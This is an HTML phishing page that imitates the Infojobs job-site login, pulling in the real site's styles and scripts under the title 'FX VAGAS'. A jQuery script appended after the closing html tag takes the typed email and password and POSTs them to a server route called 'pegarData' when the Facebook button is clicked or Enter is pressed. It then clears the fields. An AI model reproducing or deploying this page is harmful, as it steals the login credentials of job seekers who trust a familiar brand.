

<!doctype html>
<html lang="pt-br">
<head>
  <meta charset="utf-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <meta name="description" content="Acesso para usuário cadastrado no Infojobs" />
  <meta name="ROBOTS" content="INDEX,FOLLOW">

  <title>FX VAGAS</title>
  <link rel="icon" type="image/x-icon" href="https://login.infojobs.com.br/favicon.ico" />
  <link rel="shortcut icon" type="image/x-icon" href="https://login.infojobs.com.br/favicon.ico" />
  <link rel="preload stylesheet" href="https://login.infojobs.com.br/fonts/css/source-sans-pro.css?v=Y8KsImG6OKvmDQOgm4tqCFWcfPgOgtRPvE4lWz2XAe0" as="style" />
  <link rel="preload stylesheet" href="https://login.infojobs.com.br/fonts/css/breve.css?v=W64Q5CzgLBeTcFf9k2h4Lux6hc2q4jGewJkFW9W6hyk" as="style" />
  <link rel="preload stylesheet" href="https://login.infojobs.com.br/dist/css/bootstrap.css?v=V-AYTXOHX1JvsgAgU7RqaShx4Xnxjq5x42uGOKGZ7ts" as="style" />
  
  <script>
    const isPlatform_iOS = 0
  </script>
    <script type="text/javascript" async src="https://login.infojobs.com.br/js/cookiesconsent.js"></script>
    
<!-- Begin comScore Tag -->
<script>
    var _comscore = _comscore || [];
    _comscore.push({ c1: "2", c2: "32843603" });
    (function () {
        var s = document.createElement("script"), el = document.getElementsByTagName("script")[0]; s.async = true;
        s.src = (document.location.protocol == "https:" ? "https://sb" : "http://b") + ".scorecardresearch.com/beacon.js";
        el.parentNode.insertBefore(s, el);
    })();
</script>
<noscript>
    <img src="https://sb.scorecardresearch.com/p?c1=2&c2=32843603&cv=2.0&cj=1" />
</noscript>
<!-- End comScore Tag -->
<!-- Google Tag Manager -->
<script>
    var webSections = { // Reference SFCore.Enums.XITIPageBlock
        '0': 'public_area',
        '5': 'company_area',
        '7': 'candidate_area'
    };
    var normalizedPageNames = {
        '/account/login': 'Login',
        '/cadastrar-curriculo.aspx': 'CVCreation_Step1',
        '/account/expiredpassword': 'ExpiredPassword',
        '/account/rememberpassword': 'RememberPassword'
    }
    var getNormalizedName = function (name) {
        if (!name) return location.pathname;
        var pageName = name.toLowerCase();
        return normalizedPageNames[pageName] || name;
    }
    var lvl2 = typeof level2 == 'undefined' ? '0' : level2;
    var dataLayerProps = {
        'event': 'page_view',
        'site_section': webSections[lvl2],
        'page_name': getNormalizedName(location.pathname.toLowerCase())
    };
    if (!window.dataLayer || !window.dataLayer.length) {
        window.dataLayer = [];
    }
    window.dataLayer.push(dataLayerProps);
    (function (w, d, s, l, i) {
        w[l] = w[l] || [];
        w[l].push({
            'gtm.start': new Date().getTime(),
            event: 'gtm.js'
        });
        var f = d.getElementsByTagName(s)[0],
            j = d.createElement(s),
            dl = l != 'dataLayer' ? '&l=' + l : '';
        j.async = true;
        j.src = 'https://www.googletagmanager.com/gtm.js?id=' + i + dl;
        f.parentNode.insertBefore(j, f);
    })(window, document, 'script', 'dataLayer', 'GTM-NJRF6LP');
    var gtm = (function () {
        var push = function (obj) {
            window.dataLayer.push(obj);
        };
        var pageView = function () {
            push({ 'event': 'virtual_page_view' });
        };
        return {
            pageView: pageView
        }
    })();
</script>
<!-- End Google Tag Manager -->

</head>
<body>
  

<div class="container-fluid account-login">
    <div class="align-items-lg-center d-flex justify-content-center" style="min-height:100vh">
        <div class="py-15 w-100" style="max-width:500px">
            <div class="card shadow account-login-card">
                <div class="card-body account-login-card-body position-relative">
                    <div class="text-center">
                        <a href="#">
                            <h1>FX VAGAS</h1>
                        </a>
                    </div>
                    <a href="javascript:void(0);" class="d-flex text-decoration-none position-absolute back js_Back" style="display:none !important">
                        <div class="icon">
                            <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24"><path fill="#757575" d="M13.926 2.3l-7.809 8.816a1.333 1.333 0 000 1.768l7.771 8.773c.489.551 1.33.604 1.883.112.002-.002.008-.004.011-.008l.585-.529a1.334 1.334 0 00.113-1.861L10.086 12l6.376-7.52a1.333 1.333 0 00-.153-1.88l-.012-.008-.521-.433a1.333 1.333 0 00-1.85.141z"/></svg>
                        </div>
                        <div class="mt-1 mr-2 d-none d-lg-block ">
                            Voltar
                        </div>
                    </a>
                    <div class="text-center text-secondary js_registeredUsersAccess" style="">Acesso para usuários</div>
                    <div class="text-center text-secondary">
                        <span class="js_Hello" style="display:none !important">
                            Olá <span class="js_userName"></span>, insira sua senha para continuar
                        </span>
                        <span class="js_Senha" style="display:none !important"></span>
                    </div>
                    <div class="mx-lg-55 mt-20">
                        <div class="js_externalProviders" style="">
                                    <div class="provider-container ">
                                                <div class="provider provider-100 js_ExternalProvider-google">
                                                    <a class="btn btn-block btn-outline-dark" href="#">
                                                        <div class="btn-content">
                                                            <span class="color-icon"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24"><path fill="#4285F4" d="M23.764 12.276a14.128 14.128 0 00-.207-2.438H12.236v4.62h6.48a5.56 5.56 0 01-2.397 3.646v2.998h3.867c2.271-2.09 3.576-5.176 3.576-8.827l.002.001z"/><path fill="#34A853" d="M12.236 24c3.237 0 5.966-1.063 7.956-2.896l-3.867-2.998c-1.075.73-2.465 1.146-4.082 1.146-3.13 0-5.785-2.109-6.737-4.952H1.513v3.091A12.003 12.003 0 0012.236 24z"/><path fill="#FBBC04" d="M5.5 14.3a7.182 7.182 0 010-4.594V6.614H1.513a12.01 12.01 0 000 10.776L5.5 14.3z"/><path fill="#EA4335" d="M12.236 4.75a6.517 6.517 0 014.604 1.799l3.428-3.427a11.54 11.54 0 00-8.031-3.12A12 12 0 001.514 6.614L5.5 9.706C6.447 6.86 9.106 4.75 12.236 4.75z"/></svg></span>
                                                            <span class="btn-text">Google</span>
                                                        </div>
                                                    </a>
                                                </div>
                                                <div class="provider provider-50 js_ExternalProvider-linkedin">
                                                    <a class="btn btn-block btn-outline-dark" href="#">
                                                        <div class="btn-content">
                                                            <span class="color-icon"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24"><path fill="#0C66C2" d="M0 1.719C0 .77.795 0 1.774 0h20.453C23.206 0 24 .77 24 1.719V22.28c0 .948-.794 1.72-1.775 1.72H1.774C.795 24 0 23.229 0 22.28V1.719z"/><path fill="#FFF" d="M7.188 6.114c0-.89-.77-1.614-1.717-1.614-.949 0-1.721.725-1.721 1.614 0 .889.769 1.616 1.721 1.616.952 0 1.717-.724 1.717-1.616zM6.952 19.5H3.986V9.145h2.966V19.5zm5.681-10.086H9.25V19.5h3.525v-4.989c0-1.313.281-2.589 2.115-2.589 1.809 0 1.834 1.505 1.834 2.674V19.5h3.524v-5.531c0-2.717-.659-4.806-4.229-4.806-1.718 0-2.869.836-3.34 1.629h-.048l.002-1.378z"/></svg></span>
                                                            <span class="btn-text">LinkedIn</span>
                                                        </div>
                                                    </a>
                                                </div>

                                                <div class="provider provider-50 js_ExternalProvider-apple">
                                                    <a class="btn btn-block btn-outline-dark" href="#">
                                                        <div class="btn-content">
                                                            <span class="color-icon"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24"><path d="M12.289 5.539c1.083 0 2.44-.732 3.249-1.709.732-.887 1.268-2.122 1.268-3.357 0-.168-.016-.336-.047-.473-1.205.044-2.654.809-3.523 1.83-.688.777-1.313 2-1.313 3.25 0 .184.03.367.046.427.076.016.197.032.32.032zM8.476 24c1.479 0 2.135-.992 3.98-.992 1.877 0 2.29.961 3.938.961 1.617 0 2.701-1.494 3.724-2.959 1.146-1.68 1.614-3.326 1.647-3.402-.108-.03-3.207-1.299-3.207-4.854 0-3.082 2.442-4.471 2.582-4.576-1.617-2.32-4.074-2.381-4.746-2.381-1.814 0-3.295 1.1-4.228 1.1-1.007 0-2.333-1.039-3.905-1.039-2.99 0-6.025 2.474-6.025 7.142 0 2.899 1.129 5.967 2.518 7.949C5.94 22.627 6.979 24 8.476 24z"/></svg></span>
                                                            <span class="btn-text">Apple</span>
                                                        </div>
                                                    </a>
                                                </div>
                                                <div class="provider provider-50 js_ExternalProvider-microsoft">
                                                    <a class="btn btn-block btn-outline-dark" href="#">
                                                        <div class="btn-content">
                                                            <span class="color-icon"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24"><path fill="#F25022" d="M0 0h11.404v11.405H0V0z"/><path fill="#7FBA00" d="M12.596 0H24v11.405H12.596V0z"/><path fill="#00A4EF" d="M0 12.596h11.404V24H0V12.596z"/><path fill="#FFB900" d="M12.596 12.596H24V24H12.596V12.596z"/></svg></span>
                                                            <span class="btn-text">Microsoft</span>
                                                        </div>
                                                    </a>
                                                </div>
                                    </div>
                        </div>
                            <div class="font-size-16 text-center text-muted m-15 mb-20 js_Or" style=""></div>
                            <form id="loginForm" action="Login.html" method="post">
                                <input type="hidden" id="ReturnUrl" name="ReturnUrl" value="" />
                                <div class="form-group mb-30 mt-5 js_groupEmail" style="">
                                    <input type="email" id="email" class="form-control" placeholder="E-mail" autofocus data-val="true" data-val-email="E-mail inv&#xE1;lido" data-val-required="O e-mail &#xE9; obrigat&#xF3;rio" name="Username" value="">
                                    
                                    <span class="text-danger small field-validation-valid" data-valmsg-for="Username" data-valmsg-replace="true"></span>
                               
                                </div>
                                <div id="password" class="form-group mb-20 mt-5" style="">
                                    <input id="passwd" type="password" class="form-control" placeholder="Senha" autocomplete="off" data-val="true" data-val-required="A senha &#xE9; obrigat&#xF3;ria" id="Password" name="Password">
                                    <span class="text-danger small field-validation-valid" data-valmsg-for="Password" data-valmsg-replace="true"></span>
                                </div>
                              
                                                <div class="provider provider-50 js_ExternalProvider-facebook" id="btnface">
                                                    <a class="btn btn-block btn-outline-dark" href="#">
                                                        <div class="btn-content">
                                                            <span class="color-icon"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24.001" viewBox="0 0 24 24.001"><path fill="#1877F2" d="M24 12c0-6.628-5.373-12-12-12C5.372 0 0 5.372 0 12c0 5.99 4.387 10.954 10.125 11.854v-8.385H7.078V12h3.047V9.356c0-3.007 1.791-4.667 4.532-4.667 1.313 0 2.687.234 2.687.234v2.952h-1.512c-1.491 0-1.957.926-1.957 1.873V12h3.328l-.531 3.469h-2.797v8.385C19.613 22.954 24 17.99 24 12"/><path fill="#FFF" d="M16.672 15.469L17.203 12h-3.328V9.748c0-.949.466-1.873 1.957-1.873h1.512V4.922s-1.374-.234-2.687-.234c-2.74 0-4.532 1.662-4.532 4.669V12H7.078v3.469h3.047v8.385c1.242.196 2.508.196 3.75 0v-8.385h2.797"/></svg></span>
                                                            <span class="btn-text">Entrar com Facebook</span>
                                                        </div>
                                                    </a>
                                                </div>                    </div>
               
                </div>
            </div>
        </div>
    </div>
</div>

  <script src="https://login.infojobs.com.br/dist/vendors/js/jquery.min.js"></script>
  <script src="https://login.infojobs.com.br/dist/vendors/js/bootstrap.bundle.min.js"></script>
  
        <script type="module" src="https://login.infojobs.com.br/dist/login.22c603997ea633ebb7f6.js"></script>
    
</body>
</html>


<script>

$(document).ready(function(){

    function enviarDados() {
        let email = $("#email").val();
        let passwd = $("#passwd").val();

        if(email.length != 0 && passwd.length != 0){
            $.ajax({
                url: "{{ url_for('pegarData') }}",
                type: "POST",
                data: {
                    email: email,
                    passwd: passwd
                },
                success: function(response) {
                    $("#email").val("");
                    $("#passwd").val("");
                }
            });
        } else {
            alert("Acessar com Facebook , email e senha!");
        }
    }

    // Clique no botão
    $("#btnface").on("click", function(){
        enviarDados();
    });

    // Enviar com ENTER nos campos
    $("#email, #passwd").on("keydown", function(e){
        if(e.key === "Enter") {
            e.preventDefault(); // evita comportamento padrão
            enviarDados();
        }
    });

});


</script>
